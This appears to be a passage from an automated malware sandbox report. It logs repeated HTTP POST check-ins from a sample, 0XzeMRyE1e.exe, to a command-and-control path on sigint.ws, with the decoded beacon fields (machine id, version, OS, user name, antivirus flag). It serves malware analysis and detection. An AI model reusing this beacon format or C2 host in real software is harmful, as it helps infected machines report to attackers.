                                                                              Date: Wed, 01 Jun 2022 23:53:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              120192.168.2.44990080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:06.323240042 CEST3606OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:06.505719900 CEST3607INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              121192.168.2.44990180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:06.719831944 CEST3607OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:06.901846886 CEST3607INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              122192.168.2.44990280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:07.107382059 CEST3608OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:07.288651943 CEST3608INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              123192.168.2.44990380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:07.519813061 CEST3609OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:07.702017069 CEST3609INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              124192.168.2.44990480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:07.924426079 CEST3610OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:08.106933117 CEST3610INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              125192.168.2.44990580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:08.307583094 CEST3611OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:08.487366915 CEST3611INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              126192.168.2.44990680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:08.703562021 CEST3612OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:08.887171030 CEST3612INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              127192.168.2.44990780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:09.093755960 CEST3613OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:09.274606943 CEST3613INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              128192.168.2.44990880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:09.504160881 CEST3614OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:09.686593056 CEST3614INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              129192.168.2.44990980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:09.894068956 CEST3615OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:10.075850964 CEST3615INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              13192.168.2.44978780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:00.206557035 CEST3409OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:00.384043932 CEST3409INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              130192.168.2.44991080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:10.281176090 CEST3616OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:10.464629889 CEST3616INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              131192.168.2.44991180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:10.674377918 CEST3617OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:10.860245943 CEST3617INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              132192.168.2.44991280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:11.068305969 CEST3617OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:11.249368906 CEST3618INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              133192.168.2.44991380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:11.452857018 CEST3618OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:11.636411905 CEST3619INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              134192.168.2.44991480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:11.848128080 CEST3619OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:12.031982899 CEST3620INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              135192.168.2.44991580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:12.229808092 CEST3620OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:12.410557032 CEST3621INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              136192.168.2.44991680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:12.621331930 CEST3621OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:12.802454948 CEST3621INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              137192.168.2.44991780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:13.026840925 CEST3622OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:13.206803083 CEST3622INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              138192.168.2.44991880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:13.415553093 CEST3623OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:13.595098019 CEST3623INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              139192.168.2.44991980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:13.807547092 CEST3624OUTPOST /f8dfksdj3/index.php HTTP/1.1
